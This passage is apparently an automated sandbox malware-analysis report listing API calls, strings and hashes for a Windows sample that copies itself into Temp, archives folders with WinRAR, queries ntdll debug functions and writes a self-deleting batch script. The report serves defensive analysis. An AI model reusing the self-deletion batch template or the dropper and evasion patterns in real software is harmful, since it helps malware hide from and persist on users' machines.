                                • wsprintfA.USER32 ref: 00BC24DE
                                • strrchr.MSVCRT ref: 00BC24ED
                                • memset.MSVCRT ref: 00BC24F2
                                • memset.MSVCRT ref: 00BC2505
                                • wsprintfA.USER32 ref: 00BC2524
                                • Sleep.KERNEL32(000007D0), ref: 00BC2535
                                • Sleep.KERNEL32(000007D0), ref: 00BC255D
                                • memset.MSVCRT ref: 00BC256E
                                • wsprintfA.USER32 ref: 00BC2585
                                • memset.MSVCRT ref: 00BC25A6
                                • wsprintfA.USER32 ref: 00BC25CA
                                • Sleep.KERNEL32(000007D0), ref: 00BC25D0
                                • Sleep.KERNEL32(000007D0,?,?), ref: 00BC25E5
                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00BC25FC
                                • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00BC2611
                                • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00BC2642
                                • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00BC265B
                                • SetEndOfFile.KERNEL32 ref: 00BC266D
                                • CloseHandle.KERNEL32(00000000), ref: 00BC2676
                                • RemoveDirectoryA.KERNEL32(?), ref: 00BC2681
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user~1\AppData\Local\Temp\
                                • API String ID: 2203340711-1252250577
                                • Opcode ID: 9fafb57300d6bacd4246058b5d953c860be1764004c43eac57b788c013d11712
                                • Instruction ID: 78b74dbc29a45af8dd3a49df406be2e0f1d8b91cb82baccbae3c827826cf8442
                                • Opcode Fuzzy Hash: 9fafb57300d6bacd4246058b5d953c860be1764004c43eac57b788c013d11712
                                • Instruction Fuzzy Hash: 878171B2504344ABD7109F64DC85FABB7ECFB88B04F40496EFA44D31A0DB74DA498B66
                                APIs
                                • memset.MSVCRT ref: 00BC2766
                                • memset.MSVCRT ref: 00BC2774
                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00BC2787
                                • wsprintfA.USER32 ref: 00BC27AB
                                  • Part of subcall function 00BC185B: GetSystemTimeAsFileTime.KERNEL32(00BC1F92,00000000,?,00000000,?,?,?,00BC1F92,?,00000000,00000002), ref: 00BC1867
                                  • Part of subcall function 00BC185B: srand.MSVCRT ref: 00BC1878
                                  • Part of subcall function 00BC185B: rand.MSVCRT ref: 00BC1880
                                  • Part of subcall function 00BC185B: srand.MSVCRT ref: 00BC1890
                                  • Part of subcall function 00BC185B: rand.MSVCRT ref: 00BC1894
                                • wsprintfA.USER32 ref: 00BC27C6
                                • CopyFileA.KERNEL32(?,00BC4C80,00000000), ref: 00BC27D4
                                • wsprintfA.USER32 ref: 00BC27F4
                                  • Part of subcall function 00BC1973: PathFileExistsA.SHLWAPI(00BC4E5C,00000000,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe), ref: 00BC1992
                                  • Part of subcall function 00BC1973: CreateFileA.KERNEL32(00BC4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00BC19BA
                                  • Part of subcall function 00BC1973: Sleep.KERNEL32(00000064), ref: 00BC19C6
                                  • Part of subcall function 00BC1973: wsprintfA.USER32 ref: 00BC19EC
                                  • Part of subcall function 00BC1973: CopyFileA.KERNEL32(00BC4E5C,?,00000000), ref: 00BC1A00
                                  • Part of subcall function 00BC1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BC1A1E
                                  • Part of subcall function 00BC1973: GetFileSize.KERNEL32(00BC4E5C,00000000), ref: 00BC1A2C
                                  • Part of subcall function 00BC1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00BC1A46
                                  • Part of subcall function 00BC1973: ReadFile.KERNEL32(00BC4E5C,00BC4E60,00000000,?,00000000), ref: 00BC1A65
                                • DeleteFileA.KERNEL32(?,?,00BC4E54,00BC4E58), ref: 00BC281A
                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00BC4E54,00BC4E58), ref: 00BC2832
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user~1\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                • API String ID: 692489704-4282063453
                                • Opcode ID: e3d531e9be2bb940b622898474c7b4c7f797460bf856c4c00e466e71a67eb09d
                                • Instruction ID: ef8b759be4250e116def5363fca34fd445afe4174d85d1acf8054e59736e87d4
                                • Opcode Fuzzy Hash: e3d531e9be2bb940b622898474c7b4c7f797460bf856c4c00e466e71a67eb09d
                                • Instruction Fuzzy Hash: 252142B694021C7BEB10E7A49C99FDB77ECEB04B44F4045E9B654E3052EA70DF448AB0
                                APIs
                                  • Part of subcall function 00BC185B: GetSystemTimeAsFileTime.KERNEL32(00BC1F92,00000000,?,00000000,?,?,?,00BC1F92,?,00000000,00000002), ref: 00BC1867
                                  • Part of subcall function 00BC185B: srand.MSVCRT ref: 00BC1878
                                  • Part of subcall function 00BC185B: rand.MSVCRT ref: 00BC1880
                                  • Part of subcall function 00BC185B: srand.MSVCRT ref: 00BC1890
                                  • Part of subcall function 00BC185B: rand.MSVCRT ref: 00BC1894
                                • wsprintfA.USER32 ref: 00BC15AA
                                • wsprintfA.USER32 ref: 00BC15C6
                                • lstrlen.KERNEL32(?), ref: 00BC15D2
                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00BC15EE
                                • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00BC1609
                                • CloseHandle.KERNEL32(00000000), ref: 00BC1612
                                • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00BC162D
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe$open
                                • API String ID: 617340118-1643546310
                                • Opcode ID: 0e60571d9b554ac6b4ea2fde659e669f10d8ae46aa2ff9bf28ac698c994a6804
                                • Instruction ID: e585f8f3f90758a9fb058f92889c120060b5ce6064f0b0c0c4dd11d5a841738b
                                • Opcode Fuzzy Hash: 0e60571d9b554ac6b4ea2fde659e669f10d8ae46aa2ff9bf28ac698c994a6804
                                • Instruction Fuzzy Hash: 25118F72A011287ED72097A59C89EEB7AECEF09B10F4440A5F549F3051EA709B848AA0
                                APIs
                                • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00BC1400), ref: 00BC1226
                                • GetProcAddress.KERNEL32(00000000), ref: 00BC122D
                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00BC1400), ref: 00BC123F
                                • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00BC1400), ref: 00BC1250
                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe,?,?,?,?,00BC1400), ref: 00BC129E
                                • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe,?,?,?,?,00BC1400), ref: 00BC12B0
                                • CloseHandle.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe,?,?,?,?,00BC1400), ref: 00BC12F5
                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00BC1400), ref: 00BC130A
                                Strings
                                • ntdll.dll, xrefs: 00BC1219
                                • C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe, xrefs: 00BC1262
                                • ZwQuerySystemInformation, xrefs: 00BC1212
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                • String ID: C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe$ZwQuerySystemInformation$ntdll.dll
                                • API String ID: 1500695312-2268455143
                                • Opcode ID: 4f5cab964eca6629ea2ea4bd6efb3f3a5b3e9077dfa8659ccfca094fdd612b44
                                • Instruction ID: 0dcfd3c73284cb0987904d514eec142bcc180d939329b255cda5f8ee5b656517
                                • Opcode Fuzzy Hash: 4f5cab964eca6629ea2ea4bd6efb3f3a5b3e9077dfa8659ccfca094fdd612b44
                                • Instruction Fuzzy Hash: 5D21E371605311ABD7209B69CC08F6BBAE8FB8AF00F504D5CFA45EB241C770DA44C7A5
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,771AE800,?,?,00BC29DB,?,00000001), ref: 00BC26A7
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,771AE800,?,?,00BC29DB,?,00000001), ref: 00BC26B5
                                • lstrlen.KERNEL32(?), ref: 00BC26C4
                                • ??2@YAPAXI@Z.MSVCRT(-00000005), ref: 00BC26CE
                                • lstrcpy.KERNEL32(00000004,?), ref: 00BC26E3
                                • lstrcpy.KERNEL32(?,00000004), ref: 00BC271F
                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00BC272D
                                • SetEvent.KERNEL32 ref: 00BC273C
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                • String ID:
                                • API String ID: 41106472-0
                                • Opcode ID: 4988a5fca8eaafaae0e84315bf62799ee32ae2802bf1d18e0ad5b45b71816a56
                                • Instruction ID: e852ccf20ac1daec8d558f70302b2558d91e0516d0a5bc6abf380496e83727e5
                                • Opcode Fuzzy Hash: 4988a5fca8eaafaae0e84315bf62799ee32ae2802bf1d18e0ad5b45b71816a56
                                • Instruction Fuzzy Hash: 2111BF36600200EFCB21AF54EC88E5A7BE9FB88B21751806AF859C7120DF308E85DB60
                                APIs
                                • srand.MSVCRT ref: 00BC1BCD
                                • rand.MSVCRT ref: 00BC1BD8
                                • memset.MSVCRT ref: 00BC1C43
                                • memcpy.MSVCRT(?,lWQvLqwiuPDPTczYwHOSsIqLnUoEGSHKsAjbDranrWJUfWdPmAlvjisRnopqdKNarDTVmiuBQhzFzXBeJGROoeRJFxSHQAjkCYMCfcLOtGNhYfUbpZXygtvxNIubxeXZkgdwgtBaEhKyTmVIlMCEFVcZypkM,00000006,?,00000000,00000040,?,00000000,00000000,?,00000000,00000002), ref: 00BC1C4F
                                • lstrcat.KERNEL32(?,.exe), ref: 00BC1C5D
                                Strings
                                • lWQvLqwiuPDPTczYwHOSsIqLnUoEGSHKsAjbDranrWJUfWdPmAlvjisRnopqdKNarDTVmiuBQhzFzXBeJGROoeRJFxSHQAjkCYMCfcLOtGNhYfUbpZXygtvxNIubxeXZkgdwgtBaEhKyTmVIlMCEFVcZypkM, xrefs: 00BC1B8A, 00BC1B9C, 00BC1C15, 00BC1C49
                                • .exe, xrefs: 00BC1C57
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: lstrcatmemcpymemsetrandsrand
                                • String ID: .exe$lWQvLqwiuPDPTczYwHOSsIqLnUoEGSHKsAjbDranrWJUfWdPmAlvjisRnopqdKNarDTVmiuBQhzFzXBeJGROoeRJFxSHQAjkCYMCfcLOtGNhYfUbpZXygtvxNIubxeXZkgdwgtBaEhKyTmVIlMCEFVcZypkM
                                • API String ID: 122620767-1133619743
                                • Opcode ID: bad173319a9fceffd067686bc17abaf0d170360d57379de77802eb79648d33cd
                                • Instruction ID: b2442848df310df894f988a2b335175be5794a0b9aabecdb4f7b0ae3ec467ff7
                                • Opcode Fuzzy Hash: bad173319a9fceffd067686bc17abaf0d170360d57379de77802eb79648d33cd
                                • Instruction Fuzzy Hash: 45213E23F441906ED315233D6C60FAA2BC4DFABB11F1644EDF5866B1A3D6540EC68260
                                APIs
                                • memset.MSVCRT ref: 00BC18B1
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,771B0F00,75A38400), ref: 00BC18D3
                                • CloseHandle.KERNEL32(00BC2549), ref: 00BC18E9
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BC18F0
                                • GetExitCodeProcess.KERNEL32(?,00BC2549), ref: 00BC1901
                                • CloseHandle.KERNEL32(?), ref: 00BC190A
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                • String ID:
                                • API String ID: 876959470-0
                                • Opcode ID: d5cc2eff924708bcc592cd4d6f2daaefd7020b44119d7bb10f21693a580c26da
                                • Instruction ID: 1f08a3bc574f7c4e0f8c0b4cb9ed203b16168138499dcfce7bfdca22a3a5ef02
                                • Opcode Fuzzy Hash: d5cc2eff924708bcc592cd4d6f2daaefd7020b44119d7bb10f21693a580c26da
                                • Instruction Fuzzy Hash: 6A018472901128BBCB216BD5DC48EDF7FBDFF89730F104025F915A61A0D6754A18CBA0
                                APIs
                                • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00BC1334
                                • GetProcAddress.KERNEL32(00000000), ref: 00BC133B
                                • memset.MSVCRT ref: 00BC1359
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProcmemset
                                • String ID: NtSystemDebugControl$ntdll.dll
                                • API String ID: 3137504439-2438149413
                                • Opcode ID: b734c5bbf73e8fd42144fa6b7fa5ac598fc8962aaf0fefaaaac1eec51927a167
                                • Instruction ID: b175c9fc9ff9ee221fd62c8cc93783bc241fcd7799cde4e13531d162ad20e07f
                                • Opcode Fuzzy Hash: b734c5bbf73e8fd42144fa6b7fa5ac598fc8962aaf0fefaaaac1eec51927a167
                                • Instruction Fuzzy Hash: 67018B71600249BFDB109F98AC84EAFBBF8FB86708F0045AEF901B2151E7B086048A55
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: strrchr$lstrcmpilstrcpylstrlen
                                • String ID:
                                • API String ID: 3636361484-0
                                • Opcode ID: 4750f5e442673d036f6cbba10b842f5485dfe24a144196f58e75f9e2221de1a0
                                • Instruction ID: 2ab816e98bf363ce253d95629175eb09ca5fa19f01d9f49b5f73b39d8baf10a9
                                • Opcode Fuzzy Hash: 4750f5e442673d036f6cbba10b842f5485dfe24a144196f58e75f9e2221de1a0
                                • Instruction Fuzzy Hash: D901F9B390421A6FEB205764EC48FD677DCEB09310F5444AAEA45F3091EF74DA848BA0
                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(00BC1F92,00000000,?,00000000,?,?,?,00BC1F92,?,00000000,00000002), ref: 00BC1867
                                • srand.MSVCRT ref: 00BC1878
                                • rand.MSVCRT ref: 00BC1880
                                • srand.MSVCRT ref: 00BC1890
                                • rand.MSVCRT ref: 00BC1894
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: Timerandsrand$FileSystem
                                • String ID:
                                • API String ID: 4106363736-0
                                • Opcode ID: f2e5fd7b2155096420c92255057f57f92c3169e1b737aa732a2bb8008ee7fa9f
                                • Instruction ID: da5ebc2357144560b2f1f851d9ad519ba203d901e79c07092486b21c3dad5261
                                • Opcode Fuzzy Hash: f2e5fd7b2155096420c92255057f57f92c3169e1b737aa732a2bb8008ee7fa9f
                                • Instruction Fuzzy Hash: F7E0D877A00218BBD700A7F9EC46D9EBBECEE88561B100527F600D3250E971FD448AB4
                                APIs
                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00BC603C
                                • GetProcAddress.KERNEL32(00000000,00BC6064), ref: 00BC604F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: kernel32.dll
                                • API String ID: 1646373207-1793498882
                                • Opcode ID: 27b86e598121c085709b1f9ae80fd56397083c8a52743748cedeef90cd965506
                                • Instruction ID: db5a4be2ab89e158889fc10b84435c36de854a3893f2d697a4e2d276cdd58af5
                                • Opcode Fuzzy Hash: 27b86e598121c085709b1f9ae80fd56397083c8a52743748cedeef90cd965506
                                • Instruction Fuzzy Hash: 5CF0CDB11402898BEF708EA8CC84FDE3BE4EB05700F5004AEEA09DB282CB3486058B24